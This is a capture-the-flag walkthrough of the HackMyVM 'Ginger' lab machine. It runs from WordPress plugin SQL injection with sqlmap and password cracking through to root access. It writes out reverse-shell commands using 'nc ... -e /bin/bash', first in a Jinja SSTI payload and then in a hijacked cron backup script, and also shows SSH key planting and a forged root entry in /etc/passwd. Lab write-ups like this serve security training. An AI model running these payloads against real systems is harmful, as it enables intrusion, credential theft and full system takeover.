HackMyVm Ginger Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Ginger
Find IP of VM.
~ sudo arp-scan --interface eth1 192.168.56.0/24 ...
192.168.56.100 08:00:27:45:72:fc PCS Systemtechnik GmbHScan ports.
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
| 256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
|_ 256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelScan port 80.
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.html (Status: 200) [Size: 10701]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
/latest.zip (Status: 200) [Size: 16866701]Scan vulnerability of wordpress.
~ wpscan --url http://192.168.56.100/wordpress/ -e ap --no-banner --api-token your_wpscan_token --force --plugins-detection aggressive
...
[+] cp-multi-view-calendar
| Location: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/
| Last Updated: 2021-03-08T13:47:00.000Z
| Readme: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt
| [!] The version is out of date, the latest version is 1.3.99
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/, status: 200
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: CP Multi View Event Calendar <= 1.1.4 - SQL Injection & XSS
| Fixed in: 1.1.5
| References:
| - https://wpscan.com/vulnerability/50db43be-9fdb-4b5f-bba5-4c0d62689dbf
| - https://www.exploit-db.com/exploits/36243/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli/
|
| [!] Title: CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection
| Fixed in: 1.1.8
| References:
| - https://wpscan.com/vulnerability/3bf2665d-2e2d-4cc4-ac5d-7300e9cb1c11
| - https://www.exploit-db.com/exploits/37560/
|
| Version: 1.0.2 (50% confidence)
| Found By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txtSeach the exploit in exploitdb.
~ searchsploit CP Multi View Event Calendar fish-0 | 0 [14:21:49]
------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path ------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection | php/webapps/35073.txt
WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection | php/webapps/37560.txt
------------------------------------------------------------------------------------- ---------------------------------Check 37560.txt, find the sql injection point, and use sqlmap to dump database.
~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1' -p id --risk 3 --level 5 --dbs --batch
...
available databases [2]:
[*] information_schema
[*] wordpress_db
~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1' -p id --risk 3 --level 5 -D wordpress_db -T wp_users --dump
...
Table: wp_users
[1 entry]
+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1 | http://192.168.0.14/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster | 0 | webmaster | webmaster | 2021-06-02 05:28:40 | <blank> |
+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+Crack the password hash with john the ripper.
~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt
~ john --show hash.txt
?:sanitariumLogin wordpress with webmaster:sanitarium, in plugin editor, modify akismet.php, insert shell code.
image-20210609142750078.png
Visit the shell code and get reverse shell.
```
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php
~ nc -nvlp 1234 ...
Ncat: Connection from 192.168.56.100:34762.
Linux ginger 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
08:28:31 up 14 min, 0 users, load average: 0.00, 0.05, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Found 3 users in /home.
www-data@ginger:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 May 21 16:30 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
drwxr-xr-- 5 caroline webmaster 4096 May 25 08:15 caroline
drwxr-xr-x 4 sabrina sabrina 4096 May 25 08:15 sabrina
drwx------ 4 webmaster webmaster 4096 May 25 08:15 webmaster
Found hint of sabrina.
www-data@ginger:/home/sabrina$ cat password.txt
cat password.txt
I forgot my password again...
I wrote it down somewhere in this form: sabrina:password
but I don't know where... I have to search in my memory
Get the password through dmesg.
www-data@ginger:/home/sabrina$ dmesg |grep sabrina
dmesg |grep sabrina
[ 6.040104] sabrina:dontforgetyourpasswordbitch
Log in ssh as sabrina, check sudo -l.
sabrina@ginger:~$ sudo -l
Matching Defaults entries for sabrina on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sabrina may run the following commands on ginger:
(webmaster) NOPASSWD: /usr/bin/python /opt/app.py *
Check app.py, it's http server with SSTI on port 5000.
```
sabrina@ginger:~$ cat /opt/app.py
from flask import Flask, request, render_template_string,render_template
app = Flask(__name__)
@app.route('/')
def hello_ssti():
person = {'name':"world",'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
if request.args.get('name'):
person['name'] = request.args.get('name')
template = '''<h2>Hello %s!</h2>''' % person['name']
return render_template_string(template,person=person)
def get_user_file(f_name):
with open(f_name) as f:
return f.readlines()
app.jinja_env.globals['get_user_file'] = get_user_file
if __name__ == "__main__":
app.run(debug=True)Start the server as webmaster.
sabrina@ginger:~$ sudo -u webmaster python /opt/app.py *
* Serving Flask app "app" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: on
* Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
* Restarting with stat
* Debugger is active!
* Debugger PIN: 260-511-262In another terminal, use ssh to port forward port 5000.
~ ssh -L 5000:127.0.0.1:5000 sabrina@192.168.56.100Visit the server with SSTI shell code.
```
127.0.0.1:5000/?name={{request.application.globals.builtins.import(%27os%27).popen('nc 192.168.56.150 1234 -e /bin/bash').read()}}
At the same time, use nc to listen to specific port, and get reverse shell as webmaster.
~ nc -nlvp 1234 fish-0 | 0 [14:34:52]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:34772.
id
uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)
Upload id_rsa.pub to /home/webmaster/.ssh, change name to authorized_keys and chmod 600.
```
webmaster@ginger:/home/sabrina$ cd /home/webmaster
cd /home/webmaster
webmaster@ginger:~$ mkdir .ssh
mkdir .ssh
webmaster@ginger:~$ cd .ssh
cd .ssh
webmaster@ginger:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
...
Saving to: ‘authorized_keys’
authorized_keys 100%[===================>] 565 --.-KB/s in 0s
webmaster@ginger:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keysNow we can login ssh as webmaster
~ ssh webmaster@192.168.56.100
...
webmaster@ginger:~$ id
uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)Upload pspy64 to VM and check it.
```
2021/06/09 04:33:01 CMD: UID=1002 PID=883 | /bin/sh -c bash ~/backup/backup.sh
2021/06/09 04:33:01 CMD: UID=1002 PID=884 | bash /home/caroline/backup/backup.sh
UID 1002 is user caroline, and the /home/backup folder is writable to webmaster.
drwxrwx--- 2 caroline webmaster 4096 May 22 13:38 backup
Write bash code into /home/caroine/backup/backup.sh.
```
webmaster@ginger:/home/caroline$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /tmp/backup.sh
webmaster@ginger:/home/caroline$ rm backup/backup.sh
rm: remove write-protected regular file 'backup/backup.sh'? yes
webmaster@ginger:/home/caroline$ cp /tmp/backup.sh backup/
Then we get reverse shell as caroline. Again, upload id_rsa.pub and get ssh access. Check sudo -l.
caroline@ginger:~$ sudo -l
Matching Defaults entries for caroline on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User caroline may run the following commands on ginger:
(ALL : ALL) NOPASSWD: /srv/codeDisassemble code, it just calls chmod to make passwd writable in 5 seconds.
```
int __cdecl main(int argc, const char argv, const char envp)
{
system("chmod o+w /etc/passwd ; sleep 5 ; chmod o-w /etc/passwd");
return 0;
}
In 5 seconds, we write a new root user with password hash into file /etc/passwd.
caroline@ginger:/srv$ sudo /srv/code &
[1] 1220
caroline@ginger:/srv$ echo "root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash" >> /etc/passwd
caroline@ginger:/srv$ su root2
Password:
root@ginger:/srv# id;hostname
uid=0(root) gid=0(root) groups=0(root)
ginger
root@ginger:/srv#